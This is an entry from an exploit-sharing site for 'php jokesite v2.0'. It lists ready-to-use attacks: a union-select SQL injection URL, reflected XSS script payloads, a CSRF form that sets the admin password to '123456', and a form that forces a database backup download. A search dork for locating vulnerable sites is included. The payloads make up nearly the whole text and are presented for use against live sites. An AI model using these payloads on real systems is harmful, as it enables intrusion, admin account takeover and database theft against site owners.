[ authorization ] [ registration ] [ restore account ]
Contact us
You can contact us by:
0day Today Exploits Market and 0day Exploits Database

php jokesite v2.0 Multiple Vulnerabilties

Author
AtT4CKxT3rR0r1ST
Risk
[
Security Risk Critical
]
0day-ID
0day-ID-18464
Category
web applications
Date add
07-06-2012
Platform
php
php jokesite v2.0  Multiple Vulnerabilties
=======================================================================

#######################################################################
.:. Author         : AtT4CKxT3rR0r1ST  [F.Hack@w.cn]
.:. Script         : http://www.scriptdemo.com/
.:. Tested On Demo : http://www.scriptdemo.com/php-jokesite/ver2.0/
.:. Dork           : inurl:"creat_postcard.php?img_id"
#######################################################################

===[ Exploit ]===


Sql Injection
==============

http://SITE/creat_postcard.php?img_id=null[sql]

http://SITE/creat_postcard.php?img_id=null'+and+1=2+union+select+1,2,3,version(),5,6,7,8,9,10,11-- -

Go To Page Source To Found Data Sql Injection


Multiple Reflected Xss
=======================


https://SITE/jokes_category.php?cat_id=40'"--></style></script><script>alert(1337)</script>
https://SITE/pictures_category.php?cat_id='"--></style></script><script>alert(1337)</script>


CSRF (Change Password Admin)
===============================

<form method="POST" name="form0" action="http://SITE/admin/admin_password.php">
<input type="hidden" name="todo" value="chpasswd"/>
<input type="hidden" name="adm_login" value="123456"/>
<input type="hidden" name="adm_passwd" value="123456"/>
<input type="hidden" name="adm_repasswd" value="123456"/>
<input type="hidden" name="update" value="Update"/>
</form>

</body>
</html>


Database Disclosure
===================

<html>
<head>
    <title>Php Jokesite</title>

<form method="post" action="http://SITE/admin/admin_backup_db.php" name="backup">
<input type="hidden" name="todo" value="backup">
<table width="100%" cellspacing="0" cellpadding="1" border="0">

 <tr>
     <td bgcolor="#660099" align="center"><font face="Verdana, Arial" size="2" color="white"><b>Backup database</b></font></td>
 </tr>
 <tr>
   <td bgcolor="#660099">
<TABLE border="0" cellpadding="4" cellspacing="0" bgcolor="#ffffef" width="100%">
<tr>
        <td align="right"><font face="verdana" size="2" color="#FF0000"><b>Here you can backup your database.<br>We encourage you to make database backup's periodically, the loss will not be so big when something happen to the database.<br>A good option is to name your backup file in a format like this: mm-dd-yy-dbname.sql. This is automatically suggested by Internet Explorer, for other browsers you must introduce the filename.<br>Today suggested filename is : 06-06-2012-bitmix_bitmixjokev20.sql.<br>Also if you can store your backup files in the same directory, to be easy to find the files when you want to restore your database.</b></font></td>

</tr>
<tr>
        <td align="right"><input type="submit" name="save" value="Backup"></td>
</tr>
</table>

</td></tr></table>
</form>
</td>

                    </td>
                    <td width="5">
                        &nbps;

                    </td>
                </tr>
                </table>
            </td>
        </tr>
        </table>

    </td>
</tr>
</table>

</body>

</html>

####################################################################### 



#  0day.today [2024-12-25]  #